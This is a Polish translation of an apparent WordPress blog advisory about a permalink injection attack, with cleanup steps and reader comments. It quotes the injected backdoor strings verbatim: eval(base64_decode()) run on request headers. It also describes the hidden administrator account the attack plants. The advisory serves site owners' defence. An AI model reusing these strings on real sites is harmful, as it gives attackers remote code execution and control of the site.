Wiele witryn jest atakowanych przez niedawny atak SQL, w którym kody są wstrzykiwane do Twojej witryny. Ta iniekcja MySQL wpływa na Twoje linki stałe, czyniąc je nieskutecznymi. W rezultacie adresy URL Twoich wpisów na blogu nie będą działać. Liczne blogi WordPressa były celem tego ataku, Dziękujemy Andy'emu Sowardowi za zwrócenie na to naszej uwagi.
W strukturze permalinków dodano jeden z poniższych kodów z powodu tego ataku:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Te cytaty dodały wszystkie permalinki do Twojej witryny i można je zmienić tylko poprzez ręczne usunięcie.
Aby to naprawić, przejdź do:
Ustawienia > Linki stałe i usuń powyższy kod, a następnie zastąp go swoim domyślnym kodem.
Następną rzeczą, którą musisz zrobić, jest przejście do Użytkowników. Zobaczysz, że jest więcej niż jeden administrator. Nie zobaczysz ich nazw, ale zobaczysz zwiększoną liczbę. Musisz więc przejrzeć wszystkich użytkowników i znaleźć ostatniego, który się zarejestrował. Najedź kursorem na tego użytkownika i uzyskaj link. Zmień kod userid= dodając 1 do tej liczby. Jeśli więc ostatnim użytkownikiem, którego widzisz, był użytkownik nr 2, dodaj do niego 1 i zrób 3. Powinieneś znaleźć ukrytego administratora z dziwnym kodem jako imieniem. Usuń kod i zmień jego rolę na subskrybenta. Następnie wróć i usuń go.
To powinno rozwiązać problem. Możesz go również usunąć, po prostu przechodząc do swojego PHPMyAdmin. Ponieważ zobaczysz tam użytkownika.
Chcieliśmy po prostu jak najszybciej przekazać tę wiadomość, aby nasi użytkownicy mogli zostać zaktualizowani. Upewnij się, że Twój blog nie jest zainfekowany. Mamy nadzieję, że WordPress wkrótce wyda nową wersję.
Również jeśli nie wdrożyłeś niektórych z tych środków w celu zabezpieczenia swojego Obszaru Administracyjnego WordPressa.
ahmed_alaaedin
Baza danych mojej strony internetowej została zainfekowana kilka dni temu, dodając dziwne znaki i słowa po adresie URL każdego posta lub strony. Nie mogłem znaleźć nic dziwnego w ustawieniach: permalinkach ani w menu użytkowników. Co mam zrobić, aby rozwiązać ten problem? Moja firma hostingowa ma również kopię zapasową zainfekowanej bazy danych!
użytkownik WordPressa
Dwa razy mnie to trafiło.
za pierwszym razem był to plugin wassup sql injection, tym razem nie jestem pewien. mój dostawca hostingu mnie zablokował.
gdy tylko przywrócą moje konto, usunę WordPressa... Mam tego dość!
Personel redakcyjny
Być może to nie wina WordPressa, może zabezpieczenia Twojego hostingu po prostu nie są wystarczająco dobre...
Administrator
Joey
Co udało Ci się ustalić w tej sprawie? Właśnie spotkałem się z tym samym problemem. Wszystkie moje strony WP na moim koncie cierpią z powodu tego samego problemu.
lerrkin
Cześć.
Ciekawy adres URL https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ połączony stąd pokazuje pustą stronę.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Personel redakcyjny
Naprawdę doceniamy ten komentarz, problem nie leżał po stronie WP Super Cache, wierzymy, że był to wtyczka o nazwie WP External Link. Odinstalowaliśmy i ponownie zainstalowaliśmy WP-Super Cache dwukrotnie, a następnie porównaliśmy serwer deweloperski, na którym wszystko działało poprawnie. Różnicą była ta wtyczka. Kiedy usunęliśmy tę wtyczkę, zadziałało. Możesz teraz przeczytać ten post.
Administrator
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
Och, czytam!
Dzięki wielkie!
Roseli A. Bakar
Thanks for highlighting this